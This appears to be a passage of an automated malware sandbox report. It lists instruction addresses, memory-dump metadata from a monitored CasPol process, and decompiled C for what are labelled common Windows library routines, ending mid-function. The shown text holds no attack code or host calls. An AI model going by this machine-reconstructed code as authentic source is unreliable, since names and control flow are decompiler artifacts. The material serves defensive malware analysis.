                                                                        0x0040c1de
                                                                        0x0040c1e1
                                                                        0x0040c1e8
                                                                        0x0040c1eb
                                                                        0x0040c1ee
                                                                        0x0040c203
                                                                        0x0040c20a
                                                                        0x0040c20d
                                                                        0x0040c211
                                                                        0x0040c214
                                                                        0x0040c219
                                                                        0x0040c21c
                                                                        0x0040c22b
                                                                        0x0040c22e
                                                                        0x0040c235
                                                                        0x0040c238
                                                                        0x0040c23b
                                                                        0x0040c23e
                                                                        0x0040c241
                                                                        0x0040c249
                                                                        0x0040c257
                                                                        0x0040c25a
                                                                        0x0040c25d
                                                                        0x0040c25d
                                                                        0x0040c264
                                                                        0x0040c267
                                                                        0x0040c26a
                                                                        0x0040c272
                                                                        0x0040c280
                                                                        0x0040c283
                                                                        0x0040c28a
                                                                        0x0040c28d
                                                                        0x0040c290
                                                                        0x0040c293
                                                                        0x0040c296
                                                                        0x0040c29f
                                                                        0x0040c2a6
                                                                        0x0040c2a6
                                                                        0x0040c2ac
                                                                        0x0040c2c5
                                                                        0x0040c2c8
                                                                        0x0040c2cf
                                                                        0x0040c2d2
                                                                        0x0040c2d5
                                                                        0x0040c2e7
                                                                        0x0040c2f1
                                                                        0x0040c2f4
                                                                        0x0040c2fd
                                                                        0x0040c300
                                                                        0x0040c307
                                                                        0x0040c30a
                                                                        0x0040c310
                                                                        0x0040c323
                                                                        0x0040c32a
                                                                        0x0040c32d
                                                                        0x0040c330
                                                                        0x0040c333
                                                                        0x0040c33c
                                                                        0x0040c33f
                                                                        0x0040c352
                                                                        0x0040c355
                                                                        0x0040c35f
                                                                        0x0040c362
                                                                        0x0040c364
                                                                        0x0040c36d
                                                                        0x0040c370
                                                                        0x0040c383
                                                                        0x0040c389
                                                                        0x0040c38c
                                                                        0x0040c393
                                                                        0x0040c395
                                                                        0x0040c398
                                                                        0x0040c39b
                                                                        0x0040c39e
                                                                        0x0040c3a1
                                                                        0x0040c3a4
                                                                        0x0040c3ad
                                                                        0x0040c3b2
                                                                        0x0040c3b5
                                                                        0x0040c3b5
                                                                        0x0040c3c8
                                                                        0x0040c3cb
                                                                        0x0040c3ce
                                                                        0x0040c3d5
                                                                        0x0040c3d8
                                                                        0x0040c3db
                                                                        0x0040c3de
                                                                        0x0040c3f1
                                                                        0x0040c3f4
                                                                        0x0040c3ff
                                                                        0x0040c402
                                                                        0x0040c40e
                                                                        0x0040c411
                                                                        0x0040c417
                                                                        0x0040c41a
                                                                        0x0040c41d
                                                                        0x0040c424
                                                                        0x0040c434
                                                                        0x0040c437
                                                                        0x0040c43d
                                                                        0x0040c440
                                                                        0x0040c447
                                                                        0x0040c449
                                                                        0x0040c44c
                                                                        0x0040c44f
                                                                        0x0040c452
                                                                        0x0040c455
                                                                        0x0040c45c
                                                                        0x0040c46b
                                                                        0x0040c46e
                                                                        0x0040c475
                                                                        0x0040c478
                                                                        0x0040c47b
                                                                        0x0040c47e
                                                                        0x0040c481
                                                                        0x0040c484
                                                                        0x0040c487
                                                                        0x0040c490
                                                                        0x0040c4a1
                                                                        0x0040c4a9
                                                                        0x0040c4af
                                                                        0x0040c4b2
                                                                        0x0040c4b4
                                                                        0x0040c4b7
                                                                        0x0040c4ba
                                                                        0x0040c4c7

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (
                                                                        • API String ID: 0-3887548279
                                                                        • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                        • Instruction ID: cf0ae680082bb92ded5da439ca895811eadb995fb834007ffe077b633fc3d0ec
                                                                        • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                        • Instruction Fuzzy Hash: 85021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD849A7355D6746A418F80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013BB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E013BB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x148f7a8);
				E0140D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0140D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E013FD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E013FF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0140DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E013FB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E013FB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E013FE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E013FA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                        0x013bb171
                                                                        0x013bb171
                                                                        0x013bb171
                                                                        0x013bb171
                                                                        0x013bb171
                                                                        0x013bb176
                                                                        0x013bb17b
                                                                        0x013bb180
                                                                        0x013bb186
                                                                        0x013bb18f
                                                                        0x013bb198
                                                                        0x013bb1a4
                                                                        0x013bb1aa
                                                                        0x01414802
                                                                        0x01414802
                                                                        0x01414805
                                                                        0x0141480c
                                                                        0x0141480e
                                                                        0x013bb1d1
                                                                        0x013bb1d3
                                                                        0x013bb1de
                                                                        0x013bb1de
                                                                        0x01414817
                                                                        0x0141481e
                                                                        0x01414820
                                                                        0x01414822
                                                                        0x01414822
                                                                        0x01414824
                                                                        0x01414824
                                                                        0x0141482a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01414835
                                                                        0x0141483a
                                                                        0x0141483d
                                                                        0x0141483f
                                                                        0x01414842
                                                                        0x01414842
                                                                        0x01414842
                                                                        0x01414846
                                                                        0x0141484c
                                                                        0x0141484e
                                                                        0x01414851
                                                                        0x01414851
                                                                        0x01414853
                                                                        0x01414854
                                                                        0x01414854
                                                                        0x01414858
                                                                        0x0141485a
                                                                        0x0141485a
                                                                        0x0141485d
                                                                        0x0141485f
                                                                        0x01414861
                                                                        0x01414861
                                                                        0x01414866
                                                                        0x0141486b
                                                                        0x0141486e
                                                                        0x01414871
                                                                        0x01414876
                                                                        0x01414876
                                                                        0x01414878
                                                                        0x0141487b
                                                                        0x01414884
                                                                        0x01414884
                                                                        0x00000000
                                                                        0x0141487d
                                                                        0x0141487d
                                                                        0x01414882
                                                                        0x01414889
                                                                        0x01414889
                                                                        0x0141488f
                                                                        0x01414891
                                                                        0x014148e0
                                                                        0x014148e2
                                                                        0x014148e4
                                                                        0x014148e4
                                                                        0x014148e7
                                                                        0x014148e7
                                                                        0x014148ed
                                                                        0x014148f4
                                                                        0x014148f6
                                                                        0x01414951
                                                                        0x01414951
                                                                        0x01414953
                                                                        0x01414953
                                                                        0x01414956
                                                                        0x01414956
                                                                        0x01414958
                                                                        0x01414959
                                                                        0x01414959
                                                                        0x0141495d
                                                                        0x0141495d
                                                                        0x0141495f
                                                                        0x0141495f
                                                                        0x01414965
                                                                        0x01414969
                                                                        0x014149ba
                                                                        0x014149ba
                                                                        0x014149c1
                                                                        0x014149c5
                                                                        0x014149cc
                                                                        0x014149d4
                                                                        0x014149d7
                                                                        0x014149da
                                                                        0x014149e4
                                                                        0x014149e5
                                                                        0x014149f3
                                                                        0x01414a02
                                                                        0x00000000
                                                                        0x01414a02
                                                                        0x01414972
                                                                        0x01414974
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01414976
                                                                        0x01414979
                                                                        0x01414982
                                                                        0x01414983
                                                                        0x01414984
                                                                        0x0141498b
                                                                        0x0141498d
                                                                        0x01414991
                                                                        0x01414993
                                                                        0x01414999
                                                                        0x0141499d
                                                                        0x014149a2
                                                                        0x014149a2
                                                                        0x014149a2
                                                                        0x01414999
                                                                        0x014149ac
                                                                        0x00000000
                                                                        0x014149b3
                                                                        0x014148f8
                                                                        0x014148fe
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014148fe
                                                                        0x01414895
                                                                        0x0141489c
                                                                        0x014148ad
                                                                        0x014148b2
                                                                        0x014148b5
                                                                        0x014148b7
                                                                        0x014148ba
                                                                        0x014148bc
                                                                        0x014148c6
                                                                        0x014148c6
                                                                        0x014148cb
                                                                        0x014148d1
                                                                        0x014148d4
                                                                        0x014148d8
                                                                        0x014148d8
                                                                        0x00000000
                                                                        0x014148d8
                                                                        0x014148be
                                                                        0x014148c0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014148c2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014148c4
                                                                        0x00000000
                                                                        0x01414882
                                                                        0x0141487b
                                                                        0x01414904
                                                                        0x01414906
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01414908
                                                                        0x0141490e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01414910
                                                                        0x01414917
                                                                        0x01414917
                                                                        0x00000000
                                                                        0x01414917
                                                                        0x013bb1ba
                                                                        0x014147f9
                                                                        0x014147fc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014147fc
                                                                        0x013bb1c0
                                                                        0x013bb1c0
                                                                        0x013bb1c3
                                                                        0x013bb1cb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: _vswprintf_s
                                                                        • String ID:
                                                                        • API String ID: 677850445-0
                                                                        • Opcode ID: 787e0d56ed16b23371c695fbc2bfc0cd251735817de2ed2f6629c68aa5b520f0
                                                                        • Instruction ID: 17ff6546efe9bfbe16c771642fe6382f7c59e76e4eedc5e1adbb50f2d9bf4342
                                                                        • Opcode Fuzzy Hash: 787e0d56ed16b23371c695fbc2bfc0cd251735817de2ed2f6629c68aa5b520f0
                                                                        • Instruction Fuzzy Hash: 5951F275D1025A8EEB31CF78C844BAEBBB1BF00714F1841AEDD59AB3AAD7704945CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013DB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 76%
                                                                        			E013DB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x14ad360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E013D7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01488CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E013F9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E013FB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E013FCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E013D7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01488F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E013FAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x14a8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x14a862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x14a8628; // 0x0
							_t116 =  *0x14a862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                        0x013db94c
                                                                        0x013db956
                                                                        0x013db95c
                                                                        0x013db95e
                                                                        0x013db964
                                                                        0x013db969
                                                                        0x013db96d
                                                                        0x013db96d
                                                                        0x013db970
                                                                        0x013db974
                                                                        0x013db97a
                                                                        0x013dbadf
                                                                        0x013dbadf
                                                                        0x013dbae2
                                                                        0x013dbae4
                                                                        0x013dbae6
                                                                        0x013dbaf0
                                                                        0x01422cb8
                                                                        0x013dbaf6
                                                                        0x013dbaf6
                                                                        0x013dbaf6
                                                                        0x013dbafd
                                                                        0x013dbb1f
                                                                        0x013dbb1f
                                                                        0x013dbaff
                                                                        0x013dbb00
                                                                        0x013dbb00
                                                                        0x013dbb03
                                                                        0x013dbb03
                                                                        0x013dbacb
                                                                        0x013dbacf
                                                                        0x013dbad0
                                                                        0x013dbad1
                                                                        0x013dbadc
                                                                        0x013dbadc
                                                                        0x013db980
                                                                        0x013db980
                                                                        0x013db988
                                                                        0x013db98b
                                                                        0x013db98d
                                                                        0x013db990
                                                                        0x013db993
                                                                        0x013db999
                                                                        0x013db99b
                                                                        0x013db9a1
                                                                        0x013db9a5
                                                                        0x013db9aa
                                                                        0x013db9b0
                                                                        0x013db9bb
                                                                        0x013db9c0
                                                                        0x013db9c3
                                                                        0x013db9ca
                                                                        0x013db9cc
                                                                        0x013db9cf
                                                                        0x013db9d3
                                                                        0x013db9d7
                                                                        0x013dba94
                                                                        0x013dba94
                                                                        0x013dba98
                                                                        0x013dbaa3
                                                                        0x01422ccb
                                                                        0x013dbaa9
                                                                        0x013dbaa9
                                                                        0x013dbaa9
                                                                        0x013dbab1
                                                                        0x01422cd5
                                                                        0x01422cdd
                                                                        0x01422cdd
                                                                        0x013dbabb
                                                                        0x013dbabc
                                                                        0x013dbac2
                                                                        0x013dbac3
                                                                        0x013dbac3
                                                                        0x013dbac6
                                                                        0x00000000
                                                                        0x013db9dd
                                                                        0x013db9dd
                                                                        0x013db9e7
                                                                        0x013db9e7
                                                                        0x013db9ec
                                                                        0x013db9ec
                                                                        0x013db9f1
                                                                        0x013db9f5
                                                                        0x013db9fa
                                                                        0x013dba00
                                                                        0x013dba0c
                                                                        0x013dba10
                                                                        0x013dba10
                                                                        0x013dba12
                                                                        0x013dba18
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013dbb26
                                                                        0x013dbb26
                                                                        0x013dba1e
                                                                        0x013dba1e
                                                                        0x013dba23
                                                                        0x013dba25
                                                                        0x013dba2c
                                                                        0x013dba30
                                                                        0x013dba35
                                                                        0x013dba35
                                                                        0x013dba41
                                                                        0x013dba46
                                                                        0x013dba4c
                                                                        0x013dba50
                                                                        0x013dba54
                                                                        0x013dba6a
                                                                        0x013dba6e
                                                                        0x013dba70
                                                                        0x013dba74
                                                                        0x013dba78
                                                                        0x013dba7a
                                                                        0x013dba7c
                                                                        0x013dba8e
                                                                        0x013dba90
                                                                        0x013dba92
                                                                        0x013dbb14
                                                                        0x013dbb14
                                                                        0x013dbb16
                                                                        0x013dbb16
                                                                        0x00000000
                                                                        0x013dba7c
                                                                        0x013dbb0a
                                                                        0x013dbb0d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013dbb0f

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013DB9A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID:
                                                                        • API String ID: 885266447-0
                                                                        • Opcode ID: 0b73fdbd18619775f6e33046d04300474abe7c810cc2942e28f431bb91bc30d3
                                                                        • Instruction ID: 020ec11bc2abb57044610d5dc6ee21f278a8707edb2b9c5fc794e1fafe5190cd
                                                                        • Opcode Fuzzy Hash: 0b73fdbd18619775f6e33046d04300474abe7c810cc2942e28f431bb91bc30d3
                                                                        • Instruction Fuzzy Hash: 48515872A08341CFD720CF2DD08092AFBE9FB89648F56496EF68587359D770E844CB82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E2581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 84%
                                                                        			E013E2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200378, char _a1546912058) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t237;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				intOrPtr _t250;
				signed int _t253;
				signed int _t260;
				signed int _t263;
				signed int _t271;
				intOrPtr _t277;
				signed int _t279;
				signed int _t281;
				void* _t282;
				void* _t283;
				signed int _t284;
				unsigned int _t287;
				signed int _t291;
				void* _t292;
				signed int _t293;
				signed int _t297;
				void* _t308;
				intOrPtr _t313;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t329;
				signed int _t330;
				signed int _t332;
				signed int _t334;
				signed int _t336;
				void* _t337;
				void* _t339;

				_t334 = _t336;
				_t337 = _t336 - 0x4c;
				_v8 =  *0x14ad360 ^ _t334;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t329 = 0x14ab2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t287 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t277 = 0x48;
				_t307 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t322 = 0;
				_v37 = _t307;
				if(_v48 <= 0) {
					L16:
					_t45 = _t277 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t330 = 0xc0000106;
						goto L32;
					} else {
						_t329 = L013D4620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t277);
						_v52 = _t329;
						__eflags = _t329;
						if(_t329 == 0) {
							_t330 = 0xc0000017;
							goto L32;
						} else {
							 *(_t329 + 0x44) =  *(_t329 + 0x44) & 0x00000000;
							_t50 = _t329 + 0x48; // 0x48
							_t324 = _t50;
							_t307 = _v32;
							 *((intOrPtr*)(_t329 + 0x3c)) = _t277;
							_t279 = 0;
							 *((short*)(_t329 + 0x30)) = _v48;
							__eflags = _t307;
							if(_t307 != 0) {
								 *(_t329 + 0x18) = _t324;
								__eflags = _t307 - 0x14a8478;
								 *_t329 = ((0 | _t307 == 0x014a8478) - 0x00000001 & 0xfffffffb) + 7;
								E013FF3E0(_t324,  *((intOrPtr*)(_t307 + 4)),  *_t307 & 0x0000ffff);
								_t307 = _v32;
								_t337 = _t337 + 0xc;
								_t279 = 1;
								__eflags = _a8;
								_t324 = _t324 + (( *_t307 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t271 = E014439F2(_t324);
									_t307 = _v32;
									_t324 = _t271;
								}
							}
							_t291 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t330 = _v68;
								__eflags = 0;
								 *((short*)(_t324 - 2)) = 0;
								goto L32;
							} else {
								_t281 = _t329 + _t279 * 4;
								_v56 = _t281;
								do {
									__eflags = _t307;
									if(_t307 != 0) {
										_t237 =  *(_v60 + _t291 * 4);
										__eflags = _t237;
										if(_t237 == 0) {
											goto L30;
										} else {
											__eflags = _t237 == 5;
											if(_t237 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t281 =  *(_v60 + _t291 * 4);
										 *(_t281 + 0x18) = _t324;
										_t241 =  *(_v60 + _t291 * 4);
										__eflags = _t241 - 8;
										if(_t241 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t241 * 4 +  &M013E2959))) {
												case 0:
													__ax =  *0x14a8488;
													__eflags = __ax;
													if(__ax == 0) {
